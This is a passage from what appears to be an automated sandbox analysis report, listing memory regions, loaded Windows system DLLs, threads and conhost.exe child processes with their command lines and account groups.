"pagefile_0x00000071273f0000" filename = "" Region: id = 917 start_va = 0x7127580000 end_va = 0x712897ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007127580000" filename = "" Region: id = 918 start_va = 0x7ff6c4620000 end_va = 0x7ff6c471ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4620000" filename = "" Region: id = 919 start_va = 0x7ff6c474c000 end_va = 0x7ff6c474dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c474c000" filename = "" Region: id = 920 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 921 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 922 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 923 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 924 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 925 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 926 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 927 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 928 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 929 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 930 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 931 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1595 start_va = 0x7127170000 end_va = 0x71271affff entry_point = 0x0 region_type = private name = "private_0x0000007127170000" filename = "" Region: id = 1596 start_va = 0x7128ac0000 end_va = 0x7128acffff entry_point = 0x0 region_type = private name = "private_0x0000007128ac0000" filename = "" Region: id = 1597 start_va = 0x7ff6c474a000 end_va = 0x7ff6c474bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c474a000" filename = "" Region: id = 1598 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1599 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1600 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1601 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1602 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1603 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1604 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1605 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1606 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3499 start_va = 0x7126ef0000 end_va = 0x7126f2ffff entry_point = 0x0 region_type = private name = "private_0x0000007126ef0000" filename = "" Region: id = 3500 start_va = 0x71271b0000 end_va = 0x71271b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071271b0000" filename = "" Region: id = 3501 start_va = 0x7128980000 end_va = 0x7128a8dfff entry_point = 0x0 region_type = private name = "private_0x0000007128980000" filename = "" Region: id = 3502 start_va = 0x7128ab0000 end_va = 0x7128abffff entry_point = 0x0 region_type = private name = "private_0x0000007128ab0000" filename = "" Region: id = 3503 start_va = 0x7128ad0000 end_va = 0x7128e06fff entry_point = 0x7128ad0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3504 start_va = 0x7128e10000 end_va = 0x7129020fff entry_point = 0x0 region_type = private name = "private_0x0000007128e10000" filename = "" Region: id = 3505 start_va = 0x7129030000 end_va = 0x7129246fff entry_point = 0x0 region_type = private name = "private_0x0000007129030000" filename = "" Region: id = 3506 start_va = 0x7129250000 end_va = 0x7129465fff entry_point = 0x0 region_type = private name = "private_0x0000007129250000" filename = "" Region: id = 3507 start_va = 0x7129470000 end_va = 0x712957ffff entry_point = 0x0 region_type = private name = "private_0x0000007129470000" filename = "" Region: id = 3508 start_va = 0x7129580000 end_va = 0x7129637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007129580000" filename = "" Region: id = 3509 start_va = 0x7ff6c474e000 end_va = 0x7ff6c474ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c474e000" filename = "" Region: id = 3510 start_va = 0x7ffbfe9a0000 end_va = 0x7ffbfe9c1fff entry_point = 0x7ffbfe9a0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3511 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3512 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3544 start_va = 0x71271c0000 end_va = 0x71271c6fff entry_point = 0x0 region_type = private name = "private_0x00000071271c0000" filename = "" Region: id = 3545 start_va = 0x71271d0000 end_va = 0x71271d4fff entry_point = 0x71271d0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3546 start_va = 0x71271e0000 end_va = 0x71271e0fff entry_point = 0x71271e0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 3547 start_va = 0x71271f0000 end_va = 0x71271f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071271f0000" filename = "" Region: id = 3548 start_va = 0x7ffbfb2d0000 end_va = 0x7ffbfb543fff entry_point = 0x7ffbfb2d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Thread: id = 33 os_tid = 0xc50 Thread: id = 49 os_tid = 0xcac Thread: id = 61 os_tid = 0xcec Thread: id = 208 os_tid = 0x102c Process: id = "33" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe543000" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x38c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 653 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 654 start_va = 0xef75dc0000 end_va = 0xef75ddffff entry_point = 0x0 region_type = private name = "private_0x000000ef75dc0000" filename = "" Region: id = 655 start_va = 0xef75de0000 end_va = 0xef75df3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef75de0000" filename = "" Region: id = 656 start_va = 0xef75e00000 end_va = 0xef75e3ffff entry_point = 0x0 region_type = private name = "private_0x000000ef75e00000" filename = "" Region: id = 657 start_va = 0x7df5ffcd0000 end_va = 0x7ff5ffccffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffcd0000" filename = "" Region: id = 658 start_va = 0x7ff6c45f0000 end_va = 0x7ff6c4612fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c45f0000" filename = "" Region: id = 659 start_va = 0x7ff6c461d000 end_va = 0x7ff6c461dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c461d000" filename = "" Region: id = 660 start_va = 0x7ff6c461e000 end_va = 0x7ff6c461ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c461e000" filename = "" Region: id = 661 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 662 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 663 start_va = 0xef75fa0000 end_va = 0xef7609ffff entry_point = 0x0 region_type = private name = "private_0x000000ef75fa0000" filename = "" Region: id = 664 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 665 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1607 start_va = 0xef75dc0000 end_va = 0xef75dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef75dc0000" filename = "" Region: id = 1608 start_va = 0xef75dd0000 end_va = 0xef75dd6fff entry_point = 0x0 region_type = private name = "private_0x000000ef75dd0000" filename = "" Region: id = 1609 start_va = 0xef75e40000 end_va = 0xef75efdfff entry_point = 0xef75e40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1610 start_va = 0xef75f00000 end_va = 0xef75f3ffff entry_point = 0x0 region_type = private name = "private_0x000000ef75f00000" filename = "" Region: id = 1611 start_va = 0xef75f40000 end_va = 0xef75f40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef75f40000" filename = "" Region: id = 1612 start_va = 0xef75f50000 end_va = 0xef75f56fff entry_point = 0x0 region_type = private name = "private_0x000000ef75f50000" filename = "" Region: id = 1613 start_va = 0xef75f60000 end_va = 0xef75f60fff entry_point = 0x0 region_type = private name = "private_0x000000ef75f60000" filename = "" Region: id = 1614 start_va = 0xef75f70000 end_va = 0xef75f70fff entry_point = 0x0 region_type = private name = "private_0x000000ef75f70000" filename = "" Region: id = 1615 start_va = 0xef760a0000 end_va = 0xef76227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef760a0000" filename = "" Region: id = 1616 start_va = 0xef76250000 end_va = 0xef7625ffff entry_point = 0x0 region_type = private name = "private_0x000000ef76250000" filename = "" Region: id = 1617 start_va = 0xef76260000 end_va = 0xef763e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef76260000" filename = "" Region: id = 1618 start_va = 0xef763f0000 end_va = 0xef777effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef763f0000" filename = "" Region: id = 1619 start_va = 0x7ff6c44f0000 end_va = 0x7ff6c45effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c44f0000" filename = "" Region: id = 1620 start_va = 0x7ff6c461b000 end_va = 0x7ff6c461cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c461b000" filename = "" Region: id = 1621 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1622 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1623 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1624 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1625 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1626 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1627 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1628 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1629 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1630 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1631 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1632 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 34 os_tid = 0xc58 Thread: id = 50 os_tid = 0xcb4 Thread: id = 109 os_tid = 0xe54 Thread: id = 257 os_tid = 0x1108 Process: id = "34" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe76f000" os_pid = "0xc5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x274" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 666 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 667 start_va = 0x5c0bde0000 end_va = 0x5c0bdfffff entry_point = 0x0 region_type = private name = "private_0x0000005c0bde0000" filename = "" Region: id = 668 start_va = 0x5c0be00000 end_va = 0x5c0be13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0be00000" filename = "" Region: id = 669 start_va = 0x5c0be20000 end_va = 0x5c0be5ffff entry_point = 0x0 region_type = private name = "private_0x0000005c0be20000" filename = "" Region: id = 670 start_va = 0x7df5ff300000 end_va = 0x7ff5ff2fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff300000" filename = "" Region: id = 671 start_va = 0x7ff6c4700000 end_va = 0x7ff6c4722fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4700000" filename = "" Region: id = 672 start_va = 0x7ff6c472d000 end_va = 0x7ff6c472efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c472d000" filename = "" Region: id = 673 start_va = 0x7ff6c472f000 end_va = 0x7ff6c472ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c472f000" filename = "" Region: id = 674 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 675 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 676 start_va = 0x5c0bf30000 end_va = 0x5c0c02ffff entry_point = 0x0 region_type = private name = "private_0x0000005c0bf30000" filename = "" Region: id = 677 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 678 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 828 start_va = 0x5c0bde0000 end_va = 0x5c0bdeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0bde0000" filename = "" Region: id = 829 start_va = 0x5c0bdf0000 end_va = 0x5c0bdf6fff entry_point = 0x0 region_type = private name = "private_0x0000005c0bdf0000" filename = "" Region: id = 830 start_va = 0x5c0be60000 end_va = 0x5c0bf1dfff entry_point = 0x5c0be60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 831 start_va = 0x5c0bf20000 end_va = 0x5c0bf20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0bf20000" filename = "" Region: id = 832 start_va = 0x5c0c030000 end_va = 0x5c0c06ffff entry_point = 0x0 region_type = private name = "private_0x0000005c0c030000" filename = "" Region: id = 833 start_va = 0x5c0c070000 end_va = 0x5c0c076fff entry_point = 0x0 region_type = private name = "private_0x0000005c0c070000" filename = "" Region: id = 834 start_va = 0x5c0c080000 end_va = 0x5c0c080fff entry_point = 0x0 region_type = private name = "private_0x0000005c0c080000" filename = "" Region: id = 835 start_va = 0x5c0c090000 end_va = 0x5c0c09ffff entry_point = 0x0 region_type = private name = "private_0x0000005c0c090000" filename = "" Region: id = 836 start_va = 0x5c0c0a0000 end_va = 0x5c0c227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0c0a0000" filename = "" Region: id = 837 start_va = 0x5c0c230000 end_va = 0x5c0c3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0c230000" filename = "" Region: id = 838 start_va = 0x5c0c3c0000 end_va = 0x5c0d7bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0c3c0000" filename = "" Region: id = 839 start_va = 0x5c0d7c0000 end_va = 0x5c0d7c0fff entry_point = 0x0 region_type = private name = "private_0x0000005c0d7c0000" filename = "" Region: id = 840 start_va = 0x7ff6c4600000 end_va = 0x7ff6c46fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4600000" filename = "" Region: id = 841 start_va = 0x7ff6c472b000 end_va = 0x7ff6c472cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c472b000" filename = "" Region: id = 842 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 843 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 844 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 845 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 846 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 847 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 848 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 849 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 850 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 851 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 852 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 853 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 35 os_tid = 0xc60 Thread: id = 51 os_tid = 0xcbc Thread: id = 58 os_tid = 0xce0 Thread: id = 263 os_tid = 0x114c Process: id = "35" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x587ad000" os_pid = "0xc64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x6c4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 679 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 680 start_va = 0xe61ddf0000 end_va = 0xe61de0ffff entry_point = 0x0 region_type = private name = "private_0x000000e61ddf0000" filename = "" Region: id = 681 start_va = 0xe61de10000 end_va = 0xe61de23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e61de10000" filename = "" Region: id = 682 start_va = 0xe61de30000 end_va = 0xe61de6ffff entry_point = 0x0 region_type = private name = "private_0x000000e61de30000" filename = "" Region: id = 683 start_va = 0x7df5ff2d0000 end_va = 0x7ff5ff2cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff2d0000" filename = "" Region: id = 684 start_va = 0x7ff6c3c40000 end_va = 0x7ff6c3c62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3c40000" filename = "" Region: id = 685 start_va = 0x7ff6c3c6a000 end_va = 0x7ff6c3c6afff entry_point = 0x0 region_type = private name = 